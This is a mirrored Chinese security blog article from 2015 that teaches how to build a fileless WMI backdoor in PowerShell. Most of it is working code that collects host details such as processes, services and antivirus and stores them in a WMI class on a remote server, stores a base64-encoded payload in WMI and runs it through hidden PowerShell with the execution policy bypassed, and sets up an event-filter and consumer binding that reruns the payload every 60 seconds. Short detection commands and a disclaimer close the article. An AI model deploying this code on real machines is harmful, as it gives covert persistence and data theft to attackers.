WMI Backdoor
作者:
·
2015/09/01 10:47
0x00 前言
上篇介紹瞭如何透過powershell來實現WMI attacks,這次接著介紹一些進階WMI技巧---WMI Backdoor
配圖為Mandiant在M-Trends 2015報告中提到的“How threat actors use WMI to maintain persistence”(即上篇提到的隱蔽定時啟動程式)
0x01 簡介
結合上篇WMI attacks的基礎知識來設計WMI Backdoor
特點:
不在Client和Server留下任何檔案
不改動登錄檔
僅使用powershell實現
0x02 測試環境
CLIENT:
192.168.40.208
Win8x86
SERVER:
192.168.40.206
Win7x64
Username:a
Password:testtest
0x03 思路
作為後門,所以把隱蔽性放在首位
Clinet需要滿足如下功能:
上傳資訊至伺服器
獲取指令執行
定時啟動
0x04 功能實現
1、Client將本機資訊傳送至Server
《WMI attacks-3、儲存payload》提到,可將資料儲存於此,不會留下檔案,實際位於硬碟上的一個複雜的資料庫中(objects.data)
設計思路:
Client獲取主機配置資訊-連線遠端伺服器-儲存在遠端伺服器
Server讀取資訊
實現:
(1)Client獲取主機配置資訊-連線遠端伺服器-儲存在遠端伺服器
Client端Powershell程式碼如下:
#連線192.168.40.206
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'a'
$Options.Password = 'testtest'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\192.168.40.206\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
#新建類名
$EvilClass['__CLASS'] = 'Win32_UserInfo'
$EvilClass.Properties.Add('IP19216840208', [Management.CimType]::String, $False)
#獲取主機配置資訊
$GetOS=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
$GetProcess=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
$GetService=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service -Filter "State='Running'"
$GetUser=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
$GetAV=Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
#注:Powershell中換行符為`n
$EvilClass.Properties['IP19216840208'].Value = $GetUser.UserName+"`n"+"OS:"+$GetOS.Caption+";"+$GetOS.OSArchitecture+"`n"+"AntiVirusProduct:"+ $GetAV.displayName+"`n"+"Process:"+"`n"+$GetProcess.Name+"`n"+"Service Start:"+"`n"+$GetService.Name
#儲存
$EvilClass.Put()
如圖
(2)Server端執行查詢獲取主機資訊
([WmiClass] 'Win32_UserInfo').Properties['IP19216840208']
如圖
2、Client獲取指令並執行
設計思路:
Client加密儲存指令
Client讀取指令-解密-執行
實現:
(1)Client加密儲存指令
Client端Powershell程式碼如下:
#定義Payload,為保證變數能夠解析,需要使用單引號‘
$Payload=@'
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'a'
$Options.Password = 'testtest'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\192.168.40.206\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
$EvilClass['__CLASS'] = 'Win32_CommandTest'
$EvilClass.Properties.Add('IP19216840208', [Management.CimType]::String, $False)
$EvilClass.Properties['IP19216840208'].Value ="Run Command Test!"
$EvilClass.Put()
'@
#對payload作base64加密
$bytes = [System.Text.Encoding]::Unicode.GetBytes($Payload);
$EncodedPayload = [System.Convert]::ToBase64String($bytes);
#儲存加密後的payload
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('EnCommand' , $EncodedPayload)
$StaticClass.Put()
如圖
(2)檢視加密的payload
([WmiClass] 'Win32_Command').Properties['EnCommand']
如圖
(3)Client讀取指令-解密-執行
#讀取加密payload
$EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
#PowerShell執行命令
$PowerShellPayload = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -enc $EncodedPayload"
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload
#顯示解密指令
$bytes2 = [System.Convert]::FromBase64String($EncodedPayload);
$decoded = [System.Text.Encoding]::Unicode.GetString($bytes2);
"decoded Payload:"
$decoded
如圖
server端執行
([WmiClass] 'Win32_CommandTest').Properties['IP19216840208']
驗證是否成功
如圖
3、Client定時執行powershell命令
#讀取加密指令
$EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
$filterName = 'BotFilter56'
$consumerName = 'BotConsumer56'
#建立一個__EventFilter,用於設定觸發條件,每隔60s執行一次
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
#建立一個CommandLineEventConsumer,用於設定執行的操作
$Arg =@{
Name=$consumerName
CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -enc $EncodedPayload"
}
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
#用於繫結filter和consumer
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
如圖
0x05 補充
對於定時啟動功能的進一步說明
1、EventFilter
可以理解為透過執行WQL查詢來設定觸發條件,包括以下查詢:
(1)Data queries
SELECT * FROM Win32_NTLogEvent WHERE Logfile = 'Application
(2)Event queries
SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Service' AND TargetInstance._Class = 'win32_TerminalService'
(3)Schema queries
SELECT * FROM meta_class WHERE __this ISA "Win32_BaseService"
2、 consumer
可以理解為條件滿足後執行的操作,包括如下查詢:
(1)ActiveScriptEventConsumer
(2)LogFileEventConsumer
(3)NTEventLogEventConsumer
(4)SMTPEventConsumer
(5)CommandLineEventConsumer
3、使用consumer執行vbs指令碼的兩種方式
(1)直接執行現有指令碼
instance of ActiveScriptEventConsumer as $Cons
{
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptFileName = "c:\\asec2.vbs";
};
(2)內嵌指令碼,不會留下痕跡
instance of ActiveScriptEventConsumer as $Cons
{
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptText =
"Dim objFS, objFile\n"
"Set objFS = CreateObject(\"Scripting.FileSystemObject\")\n"
"Set objFile = objFS.OpenTextFile(\"C:\\ASEC.log\","
" 8, true)\nobjFile.WriteLine \"Time: \" & Now & \";"
" Entry made by: ASEC\"\nobjFile.WriteLine"
" \"Application closed. UserModeTime: \" & "
"TargetEvent.TargetInstance.UserModeTime &_\n"
"\"; KernelModeTime: \" & "
"TargetEvent.TargetInstance.KernelModeTime "
"& \" [hundreds of nanoseconds]\"\n"
"objFile.Close\n";
};
參考資料:
https://msdn.microsoft.com/en-us/library/aa392902(v=vs.85).aspx https://msdn.microsoft.com/en-us/library/aa393250(v=vs.85).aspx
0x06 小結
本文僅用來介紹WMI Attacks的進階應用技巧,請勿用於非法用途
再次提一下WMI的檢測方法:
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
檢視日誌
– Microsoft-Windows-WinRM/Operational
– Microsoft-Windows-WMI-Activity/Operational
– Microsoft-Windows-DistributedCOM
甚至禁用Winmgmt服務從根本上阻止該方法的使用
本文由三好學生原創並首發於烏雲drops,轉載請註明
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!
相關文章
- WSC、JSRAT and WMI BackdoorJS
- Linux BackdoorLinux
- JavaScript BackdoorJavaScript
- CoolPad backdoor CoolReaper
- 【backdoor attack】 POISONED FORGERY FACE: TOWARDS BACKDOOR ATTACKS ON FACE FORGERY DETECTION
- WMI Defense
- WMI Attacks
- 規避技術: WMI
- WMI攻擊與安全防禦
- wmi修改ip返回錯誤值2147942705
- 論文解讀《Neural Cleanse: Identifying and Mitigating Backdoor Attacks in Neural Networks》IDEMIT
- win10系統禁用wmi服務的方法Win10
- 域滲透之利用WMI來橫向滲透
- 8.18域橫向smb&wmi明文或hash傳遞
- WPF 已知問題 監聽 WMI 事件導致觸控失效事件
- 警惕國產挖礦木馬CPLMiner利用WMI駐留挖礦
- WMI 的攻擊,防禦與取證分析技術之攻擊篇
- WMI 的攻擊,防禦與取證分析技術之防禦篇
- 利用WMI命令入侵挖礦,新型挖礦病毒Audliodg持續活躍中
- win10系統中WMI程式佔用cpu使用率高怎麼解決Win10
- 進一步學習WDK驅動程式的SOURCES檔案、WMI驅動程式的mof檔案和wmidata.h標頭檔案